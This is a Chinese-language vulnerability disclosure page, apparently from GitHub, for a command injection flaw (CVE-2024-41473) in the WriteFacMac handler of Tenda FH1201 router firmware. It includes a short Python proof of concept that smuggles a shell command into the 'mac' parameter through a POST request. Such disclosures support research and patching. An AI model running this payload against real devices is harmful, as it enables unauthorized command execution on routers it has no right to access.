Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)

Tenda FH1201 v1.2.0.14 存在命令注入漏洞，位于 WriteFacMac 函数中。mac 参数未经任何过滤就被复制到 var 中，然后执行，因此攻击者可利用此漏洞执行任意命令

固件下载网址：https://www.tendacn.com/download/detail-3322.html

poc

import requests

ip = '192.168.74.145'

url = "http://" + ip + "/goform/WriteFacMac"
payload = ";echo 'hacker!'"

data = {"mac": payload}
response = requests.post(url, data=data)
print(response.text)

漏洞来源

https://github.com/iotresearch/iot-vuln/tree/main/Tenda/FH1201/WriteFacMac

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md

Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md

Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)

poc

漏洞来源

Files

Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md

Latest commit

History

Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md

File metadata and controls

Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)

poc

漏洞来源